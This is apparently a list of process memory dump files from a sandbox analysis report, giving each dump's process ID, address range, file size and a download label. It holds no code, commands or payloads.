memory/3212-614-0x00007FF8289D0000-0x00007FF828FC0000-memory.dmp

Filesize
5.9MB

Download
memory/3356-355-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/3356-357-0x0000000004FC0000-0x0000000005182000-memory.dmp

Filesize
1.8MB

Download
memory/3356-356-0x0000000004DD0000-0x0000000004DE2000-memory.dmp

Filesize
72KB

Download
memory/3356-354-0x0000000000400000-0x0000000000444000-memory.dmp

Filesize
272KB

Download
memory/3356-372-0x0000000005CF0000-0x000000000621C000-memory.dmp

Filesize
5.2MB

Download
memory/3356-375-0x00000000069A0000-0x0000000006A32000-memory.dmp

Filesize
584KB

Download
memory/3624-617-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3624-616-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/3716-722-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/3716-723-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/3764-47-0x0000000000C50000-0x00000000010EF000-memory.dmp

Filesize
4.6MB

Download
memory/3764-32-0x0000000000C50000-0x00000000010EF000-memory.dmp

Filesize
4.6MB

Download
memory/3884-223-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/3884-244-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4120-279-0x0000000005DD0000-0x0000000006124000-memory.dmp

Filesize
3.3MB

Download
memory/4120-286-0x000000006ECE0000-0x000000006ED2C000-memory.dmp

Filesize
304KB

Download
memory/4684-624-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4684-623-0x0000000000400000-0x0000000000464000-memory.dmp

Filesize
400KB

Download
memory/4692-471-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4692-190-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4692-75-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4692-285-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4692-74-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4692-760-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4692-159-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4692-167-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4692-48-0x0000000000EA0000-0x000000000133F000-memory.dmp

Filesize
4.6MB

Download
memory/4704-930-0x0000000000400000-0x0000000000CE9000-memory.dmp

Filesize
8.9MB

Download
memory/4704-803-0x0000000000400000-0x0000000000CE9000-memory.dmp

Filesize
8.9MB

Download
memory/4944-856-0x0000000000400000-0x00000000008AE000-memory.dmp

Filesize
4.7MB

Download
memory/4944-1080-0x0000000000400000-0x00000000008AE000-memory.dmp

Filesize
4.7MB

Download
memory/4980-209-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4980-226-0x0000000000400000-0x0000000000471000-memory.dmp

Filesize
452KB

Download
memory/4992-166-0x0000000000400000-0x0000000000454000-memory.dmp

Filesize
336KB

Download
memory/5112-241-0x0000000000400000-0x000000000056C000-memory.dmp

Filesize
1.4MB

Download
memory/5536-923-0x0000000000400000-0x0000000000E1E000-memory.dmp

Filesize
10.1MB

Download
memory/5536-1095-0x0000000000400000-0x0000000000E1E000-memory.dmp

Filesize
10.1MB

Download
memory/5900-37475-0x0000000000F10000-0x0000000000F44000-memory.dmp

Filesize
208KB

Download
memory/12212-37823-0x0000000000BB0000-0x0000000001076000-memory.dmp

Filesize
4.8MB

Download